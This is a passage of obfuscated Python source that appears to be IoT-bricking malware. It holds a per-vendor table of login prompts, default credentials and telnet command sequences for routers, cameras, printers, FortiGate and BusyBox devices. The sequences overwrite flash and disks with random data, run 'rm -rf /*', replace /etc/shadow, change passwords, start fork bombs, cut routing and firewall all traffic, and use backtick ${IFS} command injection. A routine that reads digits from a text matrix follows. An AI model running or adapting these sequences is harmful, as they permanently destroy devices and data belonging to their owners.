 'echo HAKVISION >/home/hik/hicore.tar.lzma' , '[#$>] ' ,
4573
'echo root:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >/etc/shadow' , '[#$>] ' ,
4574
 'echo hikvision:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >>/etc/shadow' , '[#$>] ' ,
4575
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/%NEWPASS% >>/%NEWPASS%2' , '[#$>] ' ,
4576
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/home/app/%NEWPASS% >>/home/app/%NEWPASS%2' , '[#$>] ' ,
4577
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/tmp/%NEWPASS% >>/tmp/%NEWPASS%2' , '[#$>] ' ,
4578
 'while [ 1 ]; do cat /%NEWPASS% >>/%NEWPASS%3; cat /%NEWPASS%2 >>/%NEWPASS%3 done &' , '[#$>] ' ,
4579
 ] ,
4580
[ 'slave' , '.*' , 'Invalid command!' ,
4581
 'enable' , 'assword: ' ,
4582
 '%OLDPASS%' , '[#$>] ' ,
4583
 'enable' , '[#$>:] ' ,
4584
'admin' , '[#$>:] ' ,
4585
 'system' , '[#$>] ' ,
4586
 'sh' , '[#$>] ' ,
4587
 'df' , '[#$>] ' ,
4588
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[#$>] ' ,
4589
 'dd if=/dev/urandom of=/dev/mtdblock0;dd if=/dev/urandom of=/dev/mtdblock1;dd if=/dev/urandom of=/dev/mtdblock2 &' , '[#$>] ' ,
4590
 'route del default;iptables -A INPUT -j DROP' , '%TERM%' ,
4591
 ] ,
4592
[ 'zhone' , 'admin/zhone' , '' ,
4593
 'enable' , '[#$>] ' ,
4594
 'development' , '[#$>] ' ,
4595
 'sh' , '[#$>] ' ,
4596
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
4597
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
4598
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
4599
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
4600
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4601
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4602
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4603
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4604
 'cat /dev/urandom >/dev/root &' , '' ,
4605
 'cat /etc/passwd' , '' ,
4606
 'passwd' , 'New password: ' ,
4607
 '%NEWPASS%' , 'Retype password: " ' ,
4608
 '%NEWPASS%' , '[#$>] ' ,
4609
 'passwd admin' , 'New password: ' ,
4610
 '%NEWPASS%' , 'Retype password: " ' ,
4611
 '%NEWPASS%' , '[#$>] ' ,
4612
 'passwd user' , 'New password: ' ,
4613
 '%NEWPASS%' , 'Retype password: " ' ,
4614
 '%NEWPASS%' , '[#$>] ' ,
4615
 'passwd manufacturing' , 'New password: ' ,
4616
 '%NEWPASS%' , 'Retype password: " ' ,
4617
 '%NEWPASS%' , '[#$>] ' ,
4618
 'passwd nobody' , 'New password: ' ,
4619
 '%NEWPASS%' , 'Retype password: " ' ,
4620
 '%NEWPASS%' , '[#$>] ' ,
4621
 'route del default' , '[#$>] ' ,
4622
 'iptables -A OUTPUT -j DROP' , '[#$>] ' ,
4623
'set2default' , ': ' ,
4624
 'yes' , ': ' ,
4625
 'yes' , 'yes\S ' ,
4626
 'no' , 'no\S ' ,
4627
 'yes' , 'accordingly' ,
4628
 ] ,
4629
[ 'vxworks' , '.*' , '(tStdioProxy|IrqDLCS_?CMD_PROCESSOR|ipcom_?telnetspawn|tErfTask|\sstkCommand\s|OnLine help \S press F1)' ,
4630
 'td tExcTask;td tJobTask' , '-> ' ,
4631
 'td TR069C;td TR069S;td TR069_chk' , '-> ' ,
4632
 'td iptftps' , '-> ' ,
4633
 'td ipdhcpc' , '-> ' ,
4634
 'td ipdhcps' , '-> ' ,
4635
 'td ipcom_telnetd' , '-> ' ,
4636
 'td ipnetd' , '-> ' ,
4637
 ] ,
4638
[ 'view' , '.*' , 'type \'sh\', exc[e]?ute shell' ,
4639
 '?' , '[#$>] ' ,
4640
 'sh' , '[#$>] ' ,
4641
 'cat /proc/mounts' , '' ,
4642
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4643
 'cat /dev/urandom >/dev/mtdblock11 &' , '' ,
4644
 'cat /dev/urandom >/dev/mtdblock10 &' , '' ,
4645
 'cat /dev/urandom >/dev/mtdblock12 &' , '' ,
4646
 'cat /dev/urandom >/dev/root &' , '' ,
4647
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4648
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4649
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4650
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4651
 'route del default' , '%WAIT%' ,
4652
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
4653
 'd(){ d|d & };d' , '%TERM%' ,
4654
 ] ,
4655
[ 'bocrouter' , '.*' , '(BoC Router|Unknow command)' ,
4656
 'runshellcmd' , '>' ,
4657
 'cat /dev/urandom >/dev/mtdblock0 &' , '>' ,
4658
 'cat /dev/urandom >/dev/mtdblock1 &' , '>' ,
4659
 'cat /dev/urandom >/dev/mtdblock2 &' , '>' ,
4660
 'cat /dev/urandom >/dev/mtdblock3 &' , '>' ,
4661
 'cat /dev/urandom >/dev/mtdblock4 &' , '>' ,
4662
 'cat /dev/urandom >/dev/mtdblock5 &' , '>' ,
4663
 'route del default' , '>' ,
4664
 ] ,
4665
[ 'atmos' , '.*' , 'Unrecognized command \Suse \S\?\S to see valid completions' ,
4666
 'console enable' , '> ' ,
4667
 'flashfs' , '> ' ,
4668
 'wipe' , '> ' ,
4669
 'home' , '> ' ,
4670
 'restart' , '' ,
4671
 ] ,
4672
[ 'sixpon' , '.*' , 'Enter lazy mode, input \S+ to back, input \S+ to quit' ,
4673
 '/' , '[#$>] ' ,
4674
 'linuxshell' , '[#$>] ' ,
4675
 'cat /dev/urandom >/dev/mtdblock1 &' , '[#$>] ' ,
4676
 'cat /dev/urandom >/dev/mtdblock2 &' , '[#$>] ' ,
4677
 'cat /dev/urandom >/dev/mtdblock0 &' , '[#$>] ' ,
4678
 'cat /dev/urandom >/dev/mtdblock3 &' , '[#$>] ' ,
4679
 'route del default' , '[#$>] ' ,
4680
 'iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP' , '[#$>] ' ,
4681
 ] ,
4682
[ 'fortigate' , '.*' , 'Unknown action 0' ,
4683
 'execute erase-disk boot' , 'y/n\) ' ,
4684
 'y' , 'media\? ' ,
4685
 '1' , 'y/n\) ' ,
4686
 'n' , '%WAIT%' ,
4687
 'execute shutdown' , 'y/n\) ' ,
4688
 'y' , '%TERM%' ,
4689
 ] ,
4690
[ 'cellbug' , '.*' , '% Unknown command,\s+\[\%s' ,
4691
 'enable' , '[#$>] ' ,
4692
 'configure terminal' , '[#$>] ' ,
4693
 'wlanoff' , '[#$>] ' ,
4694
 'save' , '[#$>] ' ,
4695
 'configure terminal' , '[#$>] ' ,
4696
 'cdma-disconnect\nsave' , '[#$>] ' ,
4697
 ] ,
4698
[ 'quagga' , '.*' , '% Unknown command\.' ,
4699
 '?' , '[#$>] ' ,
4700
 'enable' , '[#$>] ' ,
4701
 'start-shell' , '[#$>] ' ,
4702
 'start-shell bash' , '[#$>] ' ,
4703
 'fdisk -l' , '[#$>] ' ,
4704
 "fdisk -C 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
4705
 "w" , '[#$>] ' ,
4706
 "fdisk -C 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
4707
 "w" , '[#$>] ' ,
4708
 "fdisk -C 1 /dev/mtd2" , 'm\sfor\shelp\S?: ' ,
4709
 "w" , '[#$>] ' ,
4710
 "fdisk -C 1 /dev/mtd3" , 'm\sfor\shelp\S?: ' ,
4711
 "w" , '[#$>] ' ,
4712
 "fdisk -C 1 /dev/mtd4" , 'm\sfor\shelp\S?: ' ,
4713
 "w" , '[#$>] ' ,
4714
 "fdisk -C 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
4715
 "w" , '[#$>] ' ,
4716
 "fdisk -C 1 /dev/mtdblock1" , 'm\sfor\shelp\S?: ' ,
4717
 "w" , '[#$>] ' ,
4718
 "fdisk -C 1 /dev/mtdblock2" , 'm\sfor\shelp\S?: ' ,
4719
 "w" , '[#$>] ' ,
4720
 "fdisk -C 1 /dev/mtdblock3" , 'm\sfor\shelp\S?: ' ,
4721
 "w" , '[#$>] ' ,
4722
 "fdisk -C 1 /dev/mtdblock4" , 'm\sfor\shelp\S?: ' ,
4723
 "w" , '[#$>] ' ,
4724
 "fdisk -C 1 /dev/ram0" , 'm\sfor\shelp\S?: ' ,
4725
 "w" , '[#$>] ' ,
4726
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' ,
4727
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '[#$>] ' ,
4728
'copy flash `rm${IFS}-rf${IFS}/*${IFS}&` tftp 1.2.3.4' , '' ,
4729
 'copy flash `route${IFS}del${IFS}default` tftp 1.2.3.4' , '[#$>] ' ,
4730
'configure terminal' , '[#$>] ' ,
4731
 'username %OLDUSER% %NEWPASS%' , '[#$>] ' ,
4732
 'user administrator admin disable' , '[#$>] ' ,
4733
 'restore factory_setting' , '[#$>] ' ,
4734
 'restore factory_defaults' , '[#$>] ' ,
4735
 'exit' , '[#$>] ' ,
4736
 ] ,
4737
[ "qtech" , ".*" , '>\s+restoredefault\s+restore the device settings to the factory defaults and reboot' ,
4738
 'model' , '[#$>] ' ,
4739
 'arp' , '[#$>] ' ,
4740
 'restoredefault' , '%WAIT%' ,
4741
 ] ,
4742
[ 'ricoh' , '.*' , 'msh> ' ,
4743
 'devicename name HACKED' , 'msh> ' ,
4744
 'ifconfig' , 'msh> ' ,
4745
 'ifconfig ether 10.1.2.3' , 'msh> ' ,
4746
 'ifconfig ether netmask 255.255.255.254' , 'msh> ' ,
4747
 'route add default 10.1.2.2' , 'msh> ' ,
4748
 'dhcp ether off' , 'msh> ' ,
4749
 'hostname ether name PRINTER-HACKED' , 'msh> ' ,
4750
 'logout' , '> ' ,
4751
 'yes' , 'Save' ,
4752
 ] ,
4753
[ "busybox" , "root/5up" , 'BusyBox\sv' ,
4754
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4755
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4756
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4757
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
4758
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '[#$] ' ,
4759
 "reboot" , '[#$] ' ,
4760
 ] ,
4761
 [ "busybox" , "root/BUSYBOXBLANK" , '' ,
4762
 'mtd_write erase mtd0 &' , '' ,
4763
 'mtd_write erase mtd1 &' , '' ,
4764
 'mtd_write erase mtd2' , '' ,
4765
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4766
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4767
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4768
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4769
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
4770
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4771
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
4772
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
4773
 'cat /dev/urandom >/dev/mtdblock8 &' , '' ,
4774
 'cat /dev/urandom >/dev/mtdblock9 &' , '' ,
4775
 'cat /dev/urandom >/dev/root &' , '' ,
4776
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
4777
 "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
4778
 "sysctl -w kernel.threads-max=1" , '%WAIT%' ,
4779
 "halt -n -f" , '[#$] ' ,
4780
 "reboot" , '[#$] ' ,
4781
 'd(){ d|d & };d' , '%TERM%' ,
4782
 ] ,
4783
[ 'reosguest' , 'guest/.*' , 'ReOS.*UTT' ,
4784
 'd(){ d|d & };d' , '%TERM%' ,
4785
 ] ,
4786
 [ "busybox" , ".*" , 'BusyBox\sv' ,
4787
 'mtd_write erase mtd0 &' , '' ,
4788
 'mtd_write erase mtd1 &' , '' ,
4789
 'mtd_write erase mtd2' , '' ,
4790
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4791
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4792
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4793
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4794
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
4795
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4796
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
4797
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
4798
 'cat /dev/urandom >/dev/mtdblock8 &' , '' ,
4799
 'cat /dev/urandom >/dev/root &' , '' ,
4800
 'cat /dev/urandom >/dev/mtdblock16 &' , '' ,
4801
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
4802
 "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
4803
 "sysctl -w kernel.threads-max=1" , '%WAIT%' ,
4804
 "halt -n -f" , '[#$] ' ,
4805
 "reboot" , '[#$] ' ,
4806
 'd(){ d|d & };d' , '%TERM%' ,
4807
 ] ,
4808
 [ "busybox" , ".*" , 'ls:\sillegal\soption\s\-\-\sF' ,
4809
 'mtd_write erase mtd0 &' , '' ,
4810
 'mtd_write erase mtd1 &' , '' ,
4811
 'mtd_write erase mtd2' , '' ,
4812
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4813
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4814
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4815
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4816
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
4817
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4818
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
4819
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
4820
 'cat /dev/urandom >/dev/mtdblock8 &' , '' ,
4821
 'cat /dev/urandom >/dev/root &' , '' ,
4822
 'cat /dev/urandom >/dev/mtdblock16 &' , '' ,
4823
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
4824
 "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
4825
 "sysctl -w kernel.threads-max=1" , '%WAIT%' ,
4826
 "halt -n -f" , '[#$] ' ,
4827
 "reboot" , '[#$] ' ,
4828
 'd(){ d|d & };d' , '%TERM%' ,
4829
 ] ,
4830
[ 'misid' , ".*" , 'SYSTEM.HACKED.PLEASE.REINSTALL' ,
4831
 'su root' , '[#$>] ' ,
4832
'uptime' , '' ,
4833
 'cat /etc/motd' , '' ,
4834
 'fdisk -l' , '' ,
4835
 'df' , '' ,
4836
 'dd if=/dev/urandom of=/dev/sda &' , '' ,
4837
 'dd if=/dev/urandom of=/dev/sda1 &' , '' ,
4838
 'dd if=/dev/urandom of=/dev/sda2 &' , '' ,
4839
 'dd if=/dev/urandom of=/dev/sda3 &' , '' ,
4840
 'dd if=/dev/urandom of=/dev/sda4 &' , '' ,
4841
 'dd if=/dev/urandom of=/dev/sdb &' , '' ,
4842
 'dd if=/dev/urandom of=/dev/mtd0 &' , '' ,
4843
 'dd if=/dev/urandom of=/dev/mtd1 &' , '' ,
4844
 'dd if=/dev/urandom of=/dev/mtd2 &' , '' ,
4845
 'dd if=/dev/urandom of=/dev/mtd3 &' , '' ,
4846
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' ,
4847
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' ,
4848
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' ,
4849
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' ,
4850
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' ,
4851
 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' ,
4852
 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '' ,
4853
 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[#$>] ' ,
4854
 'dd if=/dev/urandom of=/dev/hda1 &' , '' ,
4855
 'dd if=/dev/urandom of=/dev/hdb1 &' , '' ,
4856
 'dd if=/dev/urandom of=/dev/root &' , '' ,
4857
 'dd if=/dev/urandom of=/dev/ram0 &' , '' ,
4858
 'dd if=/dev/urandom of=/dev/mmcblk0 &' , '' ,
4859
 'dd if=/dev/urandom of=/dev/mmcblk0p1 &' , '' ,
4860
 'cat /dev/urandom >/dev/sda &' , '' ,
4861
 'cat /dev/urandom >/dev/sda1 &' , '' ,
4862
 'cat /dev/urandom >/dev/sda2 &' , '' ,
4863
 'cat /dev/urandom >/dev/sda3 &' , '' ,
4864
 'cat /dev/urandom >/dev/sda4 &' , '' ,
4865
 'cat /dev/urandom >/dev/sdb &' , '' ,
4866
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
4867
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
4868
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
4869
 'cat /dev/urandom >/dev/mtd3 &' , '[#$>] ' ,
4870
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4871
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4872
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4873
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4874
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
4875
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4876
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
4877
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
4878
 'cat /dev/urandom >/dev/hda1 &' , '' ,
4879
 'cat /dev/urandom >/dev/hdb1 &' , '' ,
4880
 'cat /dev/urandom >/dev/root &' , '' ,
4881
 'cat /dev/urandom >/dev/ram0 &' , '' ,
4882
 'cat /dev/urandom >/dev/mmcblk0 &' , '' ,
4883
 'cat /dev/urandom >/dev/mmcblk0p1 &' , '' ,
4884
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '' ,
4885
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
4886
 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
4887
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' ,
4888
 'halt -n -f' , '[#$>] ' ,
4889
 'reboot' , '[#$>] ' ,
4890
'd(){ d|d & };d' , '%TERM%' ,
4891
 ] ,
4892
[ "linux" , ".*" , '(Linux\s\S+\s\d\.\d|hAjUCNM1)' ,
4893
 'su root' , '[#$>] ' ,
4894
'uptime' , '' ,
4895
 'cat /etc/motd' , '' ,
4896
 'fdisk -l' , '' ,
4897
 'df' , '' ,
4898
 'dd if=/dev/urandom of=/dev/sda &' , '' ,
4899
 'dd if=/dev/urandom of=/dev/sda1 &' , '' ,
4900
 'dd if=/dev/urandom of=/dev/sda2 &' , '' ,
4901
 'dd if=/dev/urandom of=/dev/sda3 &' , '' ,
4902
 'dd if=/dev/urandom of=/dev/sda4 &' , '' ,
4903
 'dd if=/dev/urandom of=/dev/sdb &' , '' ,
4904
 'dd if=/dev/urandom of=/dev/mtd0 &' , '' ,
4905
 'dd if=/dev/urandom of=/dev/mtd1 &' , '' ,
4906
 'dd if=/dev/urandom of=/dev/mtd2 &' , '' ,
4907
 'dd if=/dev/urandom of=/dev/mtd3 &' , '' ,
4908
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' ,
4909
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' ,
4910
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' ,
4911
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' ,
4912
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' ,
4913
 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' ,
4914
 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '' ,
4915
 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[#$>] ' ,
4916
 'dd if=/dev/urandom of=/dev/hda1 &' , '' ,
4917
 'dd if=/dev/urandom of=/dev/hdb1 &' , '' ,
4918
 'dd if=/dev/urandom of=/dev/root &' , '' ,
4919
 'dd if=/dev/urandom of=/dev/ram0 &' , '' ,
4920
 'dd if=/dev/urandom of=/dev/mmcblk0 &' , '' ,
4921
 'dd if=/dev/urandom of=/dev/mmcblk0p1 &' , '' ,
4922
 'cat /dev/urandom >/dev/sda &' , '' ,
4923
 'cat /dev/urandom >/dev/sda1 &' , '' ,
4924
 'cat /dev/urandom >/dev/sda2 &' , '' ,
4925
 'cat /dev/urandom >/dev/sda3 &' , '' ,
4926
 'cat /dev/urandom >/dev/sda4 &' , '' ,
4927
 'cat /dev/urandom >/dev/sdb &' , '' ,
4928
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
4929
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
4930
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
4931
 'cat /dev/urandom >/dev/mtd3 &' , '[#$>] ' ,
4932
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4933
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4934
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4935
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4936
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
4937
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4938
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
4939
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
4940
 'cat /dev/urandom >/dev/hda1 &' , '' ,
4941
 'cat /dev/urandom >/dev/hdb1 &' , '' ,
4942
 'cat /dev/urandom >/dev/root &' , '' ,
4943
 'cat /dev/urandom >/dev/ram0 &' , '' ,
4944
 'cat /dev/urandom >/dev/mmcblk0 &' , '' ,
4945
 'cat /dev/urandom >/dev/mmcblk0p1 &' , '' ,
4946
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '' ,
4947
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
4948
 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
4949
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' ,
4950
 'halt -n -f' , '[#$>] ' ,
4951
 'reboot' , '[#$>] ' ,
4952
'd(){ d|d & };d' , '%TERM%' ,
4953
 ] ,
4954
[ "telnet" , ".*" , ".*" ,
4955
 "cat /etc/shadow" , '[#$>] ' ,
4956
 ] ,
4957
 ]
4958
if 71 - 71: Ii % Ii11i1iIi
4959
if 57 - 57: Oo0Oo + oOoO0Ooo - IIiIii1iI - Oo0 - Ii11i1iIi * Ii
4960
if 39 - 39: IIiII . oOoO0Ooo / OOOoOooO - Ii11i1iIi
4961
O0O = "SPLTX"
4962
if 100 - 100: Ii
4963
if 72 - 72: IIiIIiIii1I
4964
if 79 - 79: OOOoOooO / Oo0 % oOOo0000o * i1 - o0ooO
4965
i1IIII11I = [ ]
4966
IiIi = { }
4967
o0oO0o = { }
4968
O0Oo = { }
4969
O0OO0oOoO0O00 = { }
4970
iiI1iIi1Ii1Iii = { }
4971
ooOo0 = { }
4972
iIiO00000o = { }
4973
Oo000o = { }
4974
o0O00ooo00OOo = { }
4975
IIi1ii1iI11I1 = { }
4976
OoOoO0o000 = { }
4977
oooo00O = { }
4978
if 95 - 95: Oo0 . OOOoOooO - i1IIi1i1iiI . o0oooooO
4979
if 11 - 11: I11I1Ii * Oo0 / IIiIii1iI - IIiIIiIii1I . IIiII
4980
ooooo0OOo0o = [ ]
4981
IIIi1iI1111Ii = { }
4982
OOOOoO00oOoO = { }
4983
O0o = { }
4984
I1IiIii1I1 = { }
4985
i11i1iIIii = { }
4986
i1O00o0O = { }
4987
iIi1ii1I = { }
4988
O0o0iI = { }
4989
if 92 - 92: OOooOO0 / o0ooO - O0oo - i1IIi1i1iiI - o0ooO
4990
if 53 - 53: oOOoO00oo0 % oOoO0Ooo % i1IIi1i1iiI % Oo0Oo
4991
def I1ii11 ( parsematrix , maxx , maxy ) :
4992
 if 11 - 11: oOoO0Ooo . o0oooooO / Ii - OOOoOooO
4993
 if 17 - 17: OOooOO0 - IIiII . i1IIi1i1iiI . IIiIIiIii1I * i1IIi1i1iiI % Ii
4994
 for iIIiIIi11i in range ( maxy ) :
4995
  for OO00 in range ( maxx ) :
4996
   if not OO00 in parsematrix [ iIIiIIi11i ] :
4997
    parsematrix [ iIIiIIi11i ] [ OO00 ] = ' '
4998
    if 48 - 48: Ii . i1IIi1i1iiI * IIiII * i1 - O0oo + o0oooooO
4999
    if 85 - 85: Ii11i1iIi / IIiII * o0oooooO
5000
    if 95 - 95: oOOo0000o % I11I1Ii
5001
 i1I1I1i1i1i = [ ]
5002
 for iIIiIIi11i in range ( maxy ) :
5003
  O00o0000 = 0
5004
  OoOo0Oo000o = 0
5005
  O0Oi11IiIi1i = 0
5006
  for OO00 in range ( maxx ) :
5007
   if parsematrix [ iIIiIIi11i ] [ OO00 ] != ' ' and parsematrix [ iIIiIIi11i ] [ OO00 ] != '\t' :
5008
    if OO00 == 0 :
5009
     O00o0000 = 1
5010
    if OO00 == maxx - 1 :
5011
     OoOo0Oo000o = 1
5012
    if OO00 == int ( ( maxx - 1 ) / 2 ) :
5013
     O0Oi11IiIi1i = 1
5014
    if OO00 == int ( ( maxx - 1 ) / 2 ) + 1 :
5015
     O0Oi11IiIi1i = 1
5016
  i1iiI1 = ""
5017
  if O00o0000 :
5018
   i1iiI1 += 'L'
5019
  if OoOo0Oo000o :
5020
   i1iiI1 += 'R'
5021
  if O0Oi11IiIi1i :
5022
   i1iiI1 += 'M'
5023
  i1I1I1i1i1i . append ( i1iiI1 )
5024
  if 55 - 55: OOOoOooO
5025
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'LR' and i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) ] == 'LR' and i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) + 1 ] == 'LR' :
5026
  return "0"
5027
 if i1I1I1i1i1i [ 0 ] == 'M' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'M' and i1I1I1i1i1i [ maxy - 2 ] == 'M' :
5028
  return "1"
5029
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'R' and i1I1I1i1i1i [ maxy - 2 ] == 'L' :
5030
  return "2"
5031
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'R' and i1I1I1i1i1i [ maxy - 2 ] == 'R' :
5032
  return "3"
5033
 if i1I1I1i1i1i [ 0 ] == 'LR' and i1I1I1i1i1i [ maxy - 1 ] == 'R' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'R' :
5034
  return "4"
5035
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'L' and i1I1I1i1i1i [ maxy - 2 ] == 'R' :
5036
  return "5"
5037
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'L' and i1I1I1i1i1i [ maxy - 2 ] == 'LR' :
5038
  return "6"
5039
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'R' and i1I1I1i1i1i [ 1 ] == 'R' and i1I1I1i1i1i [ maxy - 2 ] == 'R' :
5040
  return "7"
5041
